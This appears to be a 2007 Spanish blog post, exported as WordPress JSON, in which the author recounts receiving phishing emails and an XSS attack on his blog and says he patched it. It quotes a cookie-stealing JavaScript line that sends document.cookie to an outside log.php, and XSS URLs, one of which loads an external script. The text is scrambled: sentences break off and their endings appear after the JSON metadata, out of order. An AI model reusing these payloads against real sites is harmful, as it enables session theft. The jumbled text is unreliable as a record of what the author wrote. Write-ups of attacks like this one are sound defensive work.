Hoy he recibido 2 correos muy interesantes<\/p>\n
El primero proviene de <\/p>\n
Fernando Mu\u00f1iz Rozado <ferrotundo30@hotmail.com><\/p>\n
hey eres david talvez esto te interese \ud83d\ude09 LOL <\/p>\n http:\/\/webpersonaje.webspacemania.com\/ <\/p>\n Mi\u00e9rcoles, 28 de Marzo de 2007 01:22:16 a.m.<\/strong><\/p>\n \nImagin\u00e1ndome que podr\u00eda ser ingenier\u00eda social, vaci\u00e9 mis cookies y segu\u00ed el link, me location.href=’http:\/\/webpersonaje.webspacemania.com\/log.php?nice=’+escape(document.cookie)<\/p>\n Asumo que esta vez lo que buscaban era la cookie para entrar a mi passport MSN, a log.php El Segundo<\/p>\n De: Nadine Ruiz <mickey_jam99@hotmail.com> No se si ya estabas enterado pero ahi andan diciendo de la forma en que te https:\/\/www.lastdragon.net\/?year=%3C\/title%3E%3Ch1%3Esip%3C\/h1%3E%3CIMG%20SRC=javascript:location.href=http:\/\/thablog.freehostia.com\/a.js%3E<\/p>\n me gustaria saber si es posible eso ya que cuando entro ahi no sale nada. Como Y ese bug fue publicado en esta pagina <\/p>\n http:\/\/g30rg3x.com\/2007\/03\/10\/wp-fixes-bugs-y-mas\/ <\/p>\n donde se muestra un ejemplo del tipo <\/p>\n http:\/\/michoacano.com.mx\/?year=%3C\/title%3E%3Cscript%3Ealert(String.fromCharCode(103,51,48,114,103,51,95,120,32,119,97,115,32,110,111,116,32,104,101,114,101,32,88,68))%3C\/script%3E<\/p>\n pero ahi esta encriptado eso , todo esto te lo comento por que aqui dice que te hackearon <\/p>\n \nhttp:\/\/www.mbytesecurity.org\/posts\/ShitPowned.php <\/p>\n Saludos A la pregunta de c\u00f3mo lo solucione, es muy simple.<\/p>\n Yo antes que usuario Windows, soy usuario del mundo libre de GNU\/Linux, uso la computadora As\u00ed es como pude realizar la ingenier\u00eda inversa del ataque de Megabyte y lo parche Yo me pregunto cuando va a robar una cookie administrador si nunca uso la cuenta, salvo \nPara bucio, ya arregla tu p\u00e1gina<\/p>\n http:\/\/bucio.ws\/<\/p>\n Cuando le piensas quitar el desfase<\/p>\n Megabyte, Xiam te dejo un recadito aqu\u00ed.<\/p>\n http:\/\/www.mbytesecurity.org\/cookie.txt<\/p>\n Ojala nos expliques como Xiam te dejo ese mensajito ah\u00ed, me encantar\u00eda leerlo<\/p>\n","protected":false},"excerpt":{"rendered":" Hoy he recibido 2 correos muy interesantes El primero proviene de Fernando Mu\u00f1iz Rozado <ferrotundo30@hotmail.com> hey eres david talvez esto te interese \ud83d\ude09 LOL http:\/\/webpersonaje.webspacemania.com\/ Mi\u00e9rcoles, 28 de Marzo de 2007 01:22:16 a.m. Imagin\u00e1ndome que podr\u00eda ser ingenier\u00eda social, vaci\u00e9 mis cookies y segu\u00ed el link, me encontr\u00e9 que esa pagina hace una llamada a…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-103","post","type-post","status-publish","format-standard","hentry","category-hackers-and-tools"],"_links":{"self":[{"href":"https:\/\/www.lastdragon.net\/index.php?rest_route=\/wp\/v2\/posts\/103","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.lastdragon.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.lastdragon.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.lastdragon.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.lastdragon.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=103"}],"version-history":[{"count":0,"href":"https:\/\/www.lastdragon.net\/index.php?rest_route=\/wp\/v2\/posts\/103\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.lastdragon.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=103"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.lastdragon.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=103"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.lastdragon.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=103"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
\nencontr\u00e9 que esa pagina hace una llamada a alg\u00fan sitio de error de MSN y por otro lado
\nintentaba logear alguna cookie<\/p>\n
\nle envie un falso positivo, pensaba floodearlo como floodeo a los que intentan pescar
\ndatos bancarios, pero, mejor platico con Fernando para entender que intenciones tenia con
\neso.<\/p>\n
\nEnviado el: Mi\u00e9rcoles, 28 de Marzo de 2007 05:11:07 a.m.
\nPara: takumax@hotmail.com
\nAsunto: Bug en tu wordpress <\/p>\n
\nhackearon <\/p>\n
\nsolucionaste eso? <\/p>\n
\n<\/strong>
\nSin comentarios para Megabyte, no vale la pena, lo que le podr\u00eda responder se lo
\nrespond\u00ed hace much\u00edsimos d\u00edas en https:\/\/www.lastdragon.net\/?p=95<\/p>\n
\nbajo ese estilo de vida, significa que nunca uso cuentas de Administrador, a menos que
\ntenga algo que administrar, lo mismo ocurre en mi PC, nunca tengo todos los privilegios,
\nsolo para realizar configuraciones o instalar alg\u00fan programa, incluso tengo otras pc para
\nlaboratorio, donde visito las paginas que considero mas inseguras.<\/p>\n
\nsimplemente siguiendo la l\u00f3gica del c\u00f3digo, escrib\u00ed un sencillo pero efectivo parche.<\/p>\n
\nhaya que administrar, es algo que Megabyte no va a entender por que es un perdedor usuario
\nde Microsft Windows, cuando Megabyte evolucione al software libre y se vea en la necesidad
\nde tener nivel para usar uno de los mejores sistemas operativos que hay, solo entonces
\nentender\u00e1 por que sus tonter\u00edas no funcionan conmigo.<\/p>\n